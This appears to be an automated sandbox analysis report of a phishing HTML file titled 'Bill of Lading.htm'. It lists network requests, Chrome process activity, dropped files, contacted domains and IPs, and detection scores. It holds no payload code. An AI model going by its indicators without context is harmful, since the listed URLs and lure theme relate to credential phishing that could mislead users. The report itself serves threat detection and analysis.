Source: global traffic HTTP traffic detected: GET /gettype.php?gt=1e505deed3832c02c96ca5abe70df9ab&callback=geetest_1656831883419 HTTP/1.1Host: api-na.geetest.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /static/js/fullpage.9.1.0.js HTTP/1.1Host: static.geetest.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.cma-cgm.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cma-cgm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: datadome=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1
Source: global traffic HTTP traffic detected: GET /get.php?gt=1e505deed3832c02c96ca5abe70df9ab&challenge=bef8fb076d83726e66825df64615ae36&lang=en&pt=0&client_type=web&w=biKyO)VG0UrLmUQybnxWdc6wK4T8Ykrn5wGyY3O1g)y3MaPd2uihg1QxMw54hDKBBxeH7esrJWe3AhAAzZolka2PgVxh7HhCFdbiHcmOl7ksTrSKlLXnpMl5XPEg1(euAxcm8KL14VrArboqEQyi2PAkqVlmJmVG0(fcRng0WRoaiG)mlZ23W2JfoAFVjOGMckwwZMLSS3tvBeZOYbM1sZjEhZ2lLTsCh9v1S8xdcnQdXjA0k6lybEIVvLzc5ghX0blgz7u(9hyyZ3SpqLuAloaNk1EtHcWjeiyOPG4TXOZVt1MOdOHngrYTd3vnH4R(X18PxlBXlqRSEB(0(kbdpJOs2gfGqOErw(GKRJFetMPQAhmgIvh)la1TlsVx1JpWhcxnYxDy4FBjANYoL))xKzSBgIUY161q(UU)dYCyApX37MpLf6pP7SlwH6CswnkoiFr)Z7K3t6OI0ZEd5BBc0Z8FnyG2hjBBhVVZNZp48Asia9yFX2PlR)UySnNG8RwJ2WwxOYvHIhUlepc0F1QolDBpb1vkOR5hEjU(8VewKklH5F)sC0JdjS2B0Dfk7tuTaHUSsJrX(HaU6jcu2ZCpxfIR1M)A1KwIJMCZ1yrcfGx0I5ZqZY33KQvwZcdDrqQskti(dPvPafOf25hqYtbCiq70p0Gh7jzBU56wxxKmIKIzQhhn4nKqFARd0IfoAKpy9Y72xg)e8N3q(bHTUTDA09id2JPxr3saBJMzVDips9B6j)kDL)rVAJPivXBt(IBK5EDM0bzRLcgSsrCd9gCX64R6rh4UZ6tOQJWz)(JLuXjYgHXfYe2rKURc5GkZcJjYbxvQ7Rw810B1fnq51Lpcaa)Ea4leOK8kU3av2VJNI7pdg(jwERV4zyWjXiqHiOXxTwo0LkjLyFl5QRZto34GeLI5QoWnQzplH(i)mUMlleKj78aSW7fxV0)8RyvsHkLr1O247hsg9JDy78h8PFHzbKJSIphyBbSBk0UCU8ml(GSGZ3sOkYzr)6XV00g7)B1(wc1I)8188Qvrus5M9inI)tDmOi6f30)CH5socYCakcHC5ekAlhxhROIBMcZH7ZRixZX8zDEqTH)0nDIQXTvVR5g8is44bkLZLPKtPglHcRK8uTiB)0vM3wEttwgvN52vMILXFscUrW6sd(ryzkvqi8qq7kvtC4gZrec2D)Th7RR)Hb(oQmZo2llQ0egBAr5ol0hHeWlkh4VbcrsU6HfkNQStjAydj6QfdlPCF3LhYvy4)SJrU0dY(vDqRCjc7iXBfiyPvbMTOEi2CErr23YDlvMHVxP3eNDAHvxp0eGI(eMbGPxAZtXjVnnOVyGiBsnQXU5BB4(YIXQcIQDAGOu5kMxKQuVZMEVUjnDdvFdWJGKz5jLk6C402EZs0xxvO3egIthrhWM)fe5vEQYPrlmAi2wh3sv98nCqHDnPYwX3(NiyIfLHJKky0MIBWdswyhLrWawMyyTGSXRxHTqcda2PZO0OqMa8cK6UdA3SdyS6QajmC26NDRWBwUTdT4R1Cvu8vQFd6EEY4)NcKuYV9fGR2Xwcz0AU76)x)DvQPvNbUwYJKLAlXTpQk(DNmLIuHBDK((cXa2xQ7FtEbb(OsB)eo4t1E917Xt1OS8qna59K9hxMr)pnKOx3RY(N5gNCAEajGYMMS2CoeSa(aDERlHjypqDK8nIx64dxfSZiVSRmUXkWzxJYkJMmqUx8HKWYVLRgGvMdm2Gvzd59F)QDLUmlb8zYxTtPjcViIA(tidUed0(uJq55udutJMYIjxtOWtFGQOYQRWzBy((f0WhGqcEOMkRrjjcsyyAqIeP6naXARul1gj6ca6BIGOxboh4cjXlFR01P2LZFSebCJTKGncl4ALICmRmTfXys96YPKRaMsm3aXx4bIA)o)pSdYssyUMdBhicxapd5cVmohM5r6o0FfffxlW2nI84RCbl(UlRn964a)Nvt8QB(T3xcXBApkyWAO)4FYZXI4BjAF9v76PZIQEqeARNIh(StbLn2Cdk4iJWHW2urtK)WENDRLhMDO(EwvrGrPmRvaJvXU52KlFGDX0XwZI0Dpz6Nfbn0Z5Pv6uqIKqz5niph6440PEGYkGUVha8EWIFsV80YI0ZksgD0(wTL8VJ7v0we9ULB4S1NY(BifsSh1FIymv1O70IoPxkYXzewKaYJfIGV87wn29v322bNG6gQvvrsucNtQ4L2WIZRiNHqBTndRDcyvmUVAv9VI85E7fPHChZGgce8Ecjaz)PLwj0WrG4r1kc3U9GTipQ.6999822004dcfc5396dbdf0d2924447731928cbe64b2009907e0fd4fa834edf8ea729c12b1d2d3e73c938fb2384ab3d4c49f10ab76a0356597ef5ac7c23c4410b3de21638e1420367f9fcb46b58c76af055a0f43eef30032fbd2b9d39000c70b510e2ba04d0c5b373d1c4527f63703a4e3f2479324beb79fe7dc0b49116884cc&callback=geetest_1656831892905 HTTP/1.1Host: api-na.geetest.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://geo.captc
Source: global traffic HTTP traffic detected: GET /static/wind/style_https.1.5.8.css HTTP/1.1Host: static.geetest.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /static/wind/sprite.1.5.8.png HTTP/1.1Host: static.geetest.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.geetest.com/static/wind/style_https.1.5.8.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: unknown HTTPS traffic detected: 152.199.21.98:443 -> 192.168.2.3:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.109.119.57:443 -> 192.168.2.3:49764 version: TLS 1.2

System Summary
barindex
HTML document with suspicious title
Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm Tab title: Sign In
Source: Bill of Lading.htm Virustotal: Detection: 37%
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\Bill of Lading.htm
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,10084477516934632773,16157516973983746374,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1904 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,10084477516934632773,16157516973983746374,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1904 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Program Files\Google\Chrome\Application\Dictionaries Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-62C13F76-1358.pma Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\3b06c837-bcb4-4ee5-af4a-aa0512648ef9.tmp Jump to behavior
Source: classification engine Classification label: mal76.phis.winHTM@33/131@14/14
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic Jump to behavior
Source: Binary string: widevinecdm.dll.pdb source: widevinecdm.dll.0.dr
Source: Binary string: widevinecdm.dll.pdb@ source: widevinecdm.dll.0.dr
PE file contains sections with non-standard names
Source: widevinecdm.dll.0.dr Static PE information: section name: .00cfg
Source: widevinecdm.dll.0.dr Static PE information: section name: .rodata
Source: widevinecdm.dll.0.dr Static PE information: section name: _RDATA
Drops PE files
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\4952_40632354\_platform_specific\win_x64\widevinecdm.dll Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\4952_1306222165\LICENSE.txt Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 656080 Sample: Bill of Lading.htm Startdate: 03/07/2022 Architecture: WINDOWS Score: 76 22 www.cma-cgm.com 2->22 24 static.captcha-delivery.com 2->24 26 4 other IPs or domains 2->26 38 Antivirus detection for URL or domain 2->38 40 Antivirus / Scanner detection for submitted sample 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 2 other signatures 2->44 7 chrome.exe 15 289 2->7         started        signatures3 process4 dnsIp5 28 192.168.2.1 unknown unknown 7->28 30 239.255.255.250 unknown Reserved 7->30 14 C:\Users\user\AppData\...\widevinecdm.dll, PE32+ 7->14 dropped 16 C:\...\pnacl_public_x86_64_pnacl_sz_nexe, ELF 7->16 dropped 18 C:\...\pnacl_public_x86_64_pnacl_llc_nexe, ELF 7->18 dropped 20 C:\Users\user\...\pnacl_public_x86_64_ld_nexe, ELF 7->20 dropped 11 chrome.exe 21 7->11         started        file6 process7 dnsIp8 32 api-alb-eu-south-1.datadome.co 15.160.254.125, 443, 49785, 49794 HP-INTERNET-ASUS United States 11->32 34 clients.l.google.com 142.250.185.174, 443, 49733, 63148 GOOGLEUS United States 11->34 36 18 other IPs or domains 11->36
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
13.224.103.115
 ct.captcha-delivery.com United States
16509 AMAZON-02US false
15.160.254.125
 api-alb-eu-south-1.datadome.co United States
71 HP-INTERNET-ASUS false
193.109.119.57
 auth-orig.cma-cgm.com France
21203 FR-CMA-CGMFranceFR false
172.217.16.205
 accounts.google.com United States
15169 GOOGLEUS false
13.224.103.109
 d2lhhyweudwf3e.cloudfront.net United States
16509 AMAZON-02US false
15.161.117.65
 api-eu-south-1.captcha-delivery.com United States
16509 AMAZON-02US false
239.255.255.250
 unknown Reserved
unknown unknown false
142.250.185.174
 clients.l.google.com United States
15169 GOOGLEUS false
13.224.103.36
 d3ta1auemfotoc.cloudfront.net United States
16509 AMAZON-02US false
13.224.103.23
 js.datadome.co United States
16509 AMAZON-02US false
99.83.174.33
 api-na.geetest.com United States
16509 AMAZON-02US false
152.199.21.98
 cs314.wpc.zetacdn.net United States
15133 EDGECASTUS false

Private

IP
192.168.2.1
127.0.0.1

Contacted Domains

Name IP Active
cs314.wpc.zetacdn.net 152.199.21.98 true
ct.captcha-delivery.com 13.224.103.115 true
api-alb-eu-south-1.datadome.co 15.160.254.125 true
d2lhhyweudwf3e.cloudfront.net 13.224.103.109 true
accounts.google.com 172.217.16.205 true
auth-orig.cma-cgm.com 193.109.119.57 true
api-na.geetest.com 99.83.174.33 true
js.datadome.co 13.224.103.23 true
d3ta1auemfotoc.cloudfront.net 13.224.103.36 true
clients.l.google.com 142.250.185.174 true
api-eu-south-1.captcha-delivery.com 15.161.117.65 true
clients2.google.com unknown unknown
www.cma-cgm.com unknown unknown
static.captcha-delivery.com unknown unknown
geo.captcha-delivery.com unknown unknown
api-js.datadome.co unknown unknown
auth.cma-cgm.com unknown unknown
static.geetest.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5 false
    		unknown
    https://api-js.datadome.co/js/ false
      		high
      https://static.geetest.com/static/js/fullpage.9.1.0.js false
        		high
        https://static.captcha-delivery.com/captcha/assets/tpl/6dc485c0c428c35b53577b146dc6f9179f55ef9ad41b327a2a179998839364bf/index.css false
        • Avira URL Cloud: safe
        		 unknown
        https://ct.captcha-delivery.com/c.js false
        • Avira URL Cloud: safe
        		 unknown
        file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm true
          		low
          https://static.geetest.com/static/wind/style_https.1.5.8.css false
            		high
            https://www.cma-cgm.com/ false
              		high
              https://static.captcha-delivery.com/common/fonts/roboto/font-face.css false
              • Avira URL Cloud: safe
              		 unknown
              https://static.captcha-delivery.com/common/fonts/roboto/roboto.woff2 false
              • Avira URL Cloud: safe
              		 unknown
              https://api-na.geetest.com/gettype.php?gt=1e505deed3832c02c96ca5abe70df9ab&callback=geetest_1656831883419 false
                		high
                https://auth.cma-cgm.com/TSbd/08337f9cc5ab200098c9bf786f804c6cd4f8d35ad295482c9b58fcd74625ba236252d06005b7c679?type=2 false
                  		high
                  https://js.datadome.co/tags.js false
                    		high
                    https://static.captcha-delivery.com/captcha/assets/tpl/6dc485c0c428c35b53577b146dc6f9179f55ef9ad41b327a2a179998839364bf/loading_spinner.gif false
                    • Avira URL Cloud: safe
                    		 unknown
                    https://auth.cma-cgm.com/assets/images/ecom/favico/cmacgm.png false
                      		high
                      https://static.geetest.com/static/wind/sprite.1.5.8.png false
                        		high
                        https://www.cma-cgm.com/ false
                          		high
                          https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 false
                            		high
                            https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard false
                              		high
                              https://www.cma-cgm.com/favicon.ico false
                                		high
                                https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5 true
                                  		unknown
                                  https://www.cma-cgm.com/Images/signin-cmacgm.jpg false
                                    		high
                                    https://static.captcha-delivery.com/captcha/assets/set/45d788cda3c3698f9b00f48b6b6f6dfb843702dd/logo.png?update_cache=-8246815016896654048 false
                                    • Avira URL Cloud: safe
                                    		 unknown
                                    https://www.cma-cgm.com/Images/signin-cmacgm.jpg false
                                      		high